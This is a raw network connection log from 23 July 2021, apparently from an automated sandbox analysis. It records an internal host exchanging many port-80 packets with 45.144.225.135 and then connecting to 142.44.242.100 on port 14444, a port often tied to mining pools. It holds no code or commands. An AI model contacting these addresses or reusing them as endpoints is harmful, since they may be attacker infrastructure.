Jul 23, 2021 22:24:25.013689995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.013716936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013742924 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.013777971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013822079 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.013837099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013892889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.013935089 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.013950109 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.014007092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.014050961 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.021528959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.021553993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.021567106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.021583080 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.021601915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.021619081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.021621943 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.021635056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.021651030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.021655083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.021683931 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.021708012 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.022212029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.022294044 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.022346020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.023354053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.023408890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.023454905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.023499966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.023519993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.023564100 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.023628950 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.024467945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.024573088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.024581909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.024609089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.024658918 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.024738073 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.024934053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.025022030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.025054932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.025084972 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.025120020 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.025145054 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.025151014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.025181055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.025212049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.025217056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.025264025 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.028162956 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.028198004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.028228045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.028280020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.028347969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.028403044 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.028449059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.028650999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.028712988 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.028784990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.028889894 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.028942108 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.028984070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029145956 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029202938 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029339075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029371023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029400110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029418945 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029429913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029460907 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029484987 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029495001 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029522896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029546022 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029547930 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029573917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029592037 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029601097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029627085 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029653072 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029679060 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029680014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029700041 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029709101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029738903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029762030 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029783010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029803038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029805899 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029823065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029843092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029863119 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029886007 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029887915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029892921 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029911041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029912949 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029931068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029947042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029956102 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029967070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.029975891 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.029992104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030009985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.030312061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030334949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030354023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030375004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030380964 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.030395031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030404091 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.030414104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030435085 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030445099 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.030456066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030481100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030482054 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.030503035 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030523062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030528069 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.030544043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.030606985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038395882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038429022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038450003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038471937 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038492918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038491964 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038515091 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038536072 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038538933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038554907 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038562059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038582087 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038585901 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038606882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038628101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038629055 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038650036 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038670063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038686037 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038691044 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038716078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038821936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038850069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038868904 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038873911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038894892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038913012 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038917065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038938046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038954973 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.038959026 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038979053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.038994074 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039000034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039026022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039037943 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039048910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039069891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039089918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039108992 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039110899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039150953 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039153099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039174080 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039195061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039196014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039216995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039242029 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039242029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039264917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039285898 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039305925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039326906 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039345980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039346933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039355993 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039366961 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039386988 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039411068 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039412975 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039417982 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039443970 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039463997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039475918 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039489031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039511919 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039520025 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.039532900 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.039560080 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048013926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048068047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048108101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048146963 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048146009 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048187017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048229933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048233032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048274994 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048285961 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048314095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048314095 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048355103 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048393965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048432112 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048433065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048474073 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048504114 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048512936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048557997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048561096 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048599958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048639059 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048662901 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048679113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048719883 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048727036 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048758984 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048799038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048836946 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048842907 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048882008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048902988 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048922062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048959017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.048979044 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.048998117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049040079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049052954 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049077988 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049118042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049149036 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049155951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049200058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049201012 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049240112 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049278021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049309969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049344063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049384117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049420118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049459934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049489975 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049498081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049544096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049556971 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049585104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049621105 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049631119 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049659967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049699068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049705982 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049738884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049792051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049802065 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049832106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049876928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049884081 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049917936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049957037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.049984932 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.049997091 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050035954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050072908 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050076008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050116062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050139904 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050154924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050199032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050231934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050240993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050287962 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050301075 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050333023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050374031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050385952 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050416946 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050457001 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050467014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050494909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050534010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050558090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050574064 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050616980 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050620079 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050671101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050703049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050714970 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050726891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050751925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050770998 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050776958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050798893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050815105 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050822020 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050844908 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050859928 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050875902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050899029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050909996 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050921917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050946951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050971031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.050973892 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.050992966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.051012993 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.051285028 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.053692102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.053725958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.053749084 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.053771973 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.053792000 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.053795099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.053817987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.053838968 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.053841114 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.053862095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.053879976 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:25.053884029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:25.053931952 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:27.289343119 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:25:16.407635927 CEST	49766	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:25:16.437010050 CEST	80	49766	45.144.225.135	192.168.2.4
Jul 23, 2021 22:25:16.437700987 CEST	49766	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:25:16.437726021 CEST	49766	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:25:16.466845036 CEST	80	49766	45.144.225.135	192.168.2.4
Jul 23, 2021 22:25:16.468919992 CEST	80	49766	45.144.225.135	192.168.2.4
Jul 23, 2021 22:25:16.468975067 CEST	80	49766	45.144.225.135	192.168.2.4
Jul 23, 2021 22:25:16.469120026 CEST	49766	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:25:17.532587051 CEST	49767	14444	192.168.2.4	142.44.242.100
Jul 23, 2021 22:25:17.645473003 CEST	14444	49767	142.44.242.100	192.168.2.4
